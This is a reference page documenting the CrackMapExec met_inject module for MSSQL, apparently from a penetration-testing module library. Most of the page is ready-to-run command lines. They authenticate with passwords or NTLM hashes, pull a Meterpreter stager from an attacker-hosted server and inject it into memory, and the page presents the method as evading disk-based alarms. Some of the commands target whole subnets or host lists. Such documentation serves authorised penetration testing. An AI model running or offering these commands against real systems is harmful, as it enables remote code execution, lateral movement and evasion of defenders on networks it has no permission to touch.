CrackMapExec Met_inject (mssql)

This page contains detailed information about how to use the met_inject CME module while using the mssql protocol. For list of all CrackMapExec modules, visit the CrackMapExec Module Library.

Description

---

This module downloads the Meterpreter stager and injects it into memory using PowerSploit's Invoke-Shellcode.ps1 script. Use this with the Metasploit web_delivery module.

The met_inject module is OPSEC safe. This means that it doesn't touch the disk and therefore shouldn't trigger any alarms.

Supported Protocols

---

• mssql
• smb

Module Source Code

---

• https://github.com/byt3bl33d3r/CrackMapExec/tree/master/cme/modules/met_inject.py

Authors

---

• @byt3bl33d3r

Module Options

---

Here is a complete list of met_inject module options:

# cme mssql -M met_inject --options
[*] met_inject module options:

            SRVHOST     IP hosting of the stager server
            SRVPORT     Stager port
            RAND        Random string given by metasploit
            SSL         Stager server use https or http (default: https)

The SRVHOST, SRVPORT and RAND options are required! Make sure to set them when using this module.

Module Usage

---

This is how to use the met_inject module while using the mssql protocol:

Syntax:
# cme mssql <TARGET[s]> -u <USERNAME> -p <PASSWORD> -d <DOMAIN> -M met_inject -o SRVHOST=<host> -o SRVPORT=<port> -o RAND=<random>

Admin user:
# cme mssql 10.0.5.1 -u sa -p P@ss123 -d . -M met_inject -o SRVHOST=10.0.6.11 -o SRVPORT=443 -o RAND=fXMS45W
# cme mssql 10.0.5.1 -u sa -p P@ss123 --local-auth -M met_inject -o SRVHOST=10.0.6.11 -o SRVPORT=443 -o RAND=fXMS45W

Normal user:
# cme mssql 10.0.5.1 -u dbuser -p P@ss123 -d target.corp -M met_inject -o SRVHOST=10.0.6.11 -o SRVPORT=443 -o RAND=fXMS45W

CrackMapExec also supports passing the hash, so you can specify NTLM hash instead of a password:

# cme mssql 10.0.5.1 -u sa -H 432b022dc22aa5afe884e986b8383ff2 -d . -M met_inject -o SRVHOST=10.0.6.11 -o SRVPORT=443 -o RAND=fXMS45W
# cme mssql 10.0.5.1 -u dbuser -H 432b022dc22aa5afe884e986b8383ff2 -d target.corp -M met_inject -o SRVHOST=10.0.6.11 -o SRVPORT=443 -o RAND=fXMS45W

The met_inject module can be also used against multiple hosts. Here's how to run it against multiple hosts:

# cme mssql target_list.txt -u sa -p P@ss123 -d . -M met_inject -o SRVHOST=10.0.6.11 -o SRVPORT=443 -o RAND=fXMS45W
# cme mssql 10.0.5.0/24 -u sa -p P@ss123 -d . -M met_inject -o SRVHOST=10.0.6.11 -o SRVPORT=443 -o RAND=fXMS45W
# cme mssql 10.0.5.1-100 -u sa -p P@ss123 -d . -M met_inject -o SRVHOST=10.0.6.11 -o SRVPORT=443 -o RAND=fXMS45W

References

---

• https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/multi/script/web_delivery
• https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1
• https://github.com/jaredhaight/Invoke-MetasploitPayload

Version

---

This page has been created based on CrackMapExec version 5.1.7dev.
Visit CrackMapExec Module Library for more modules.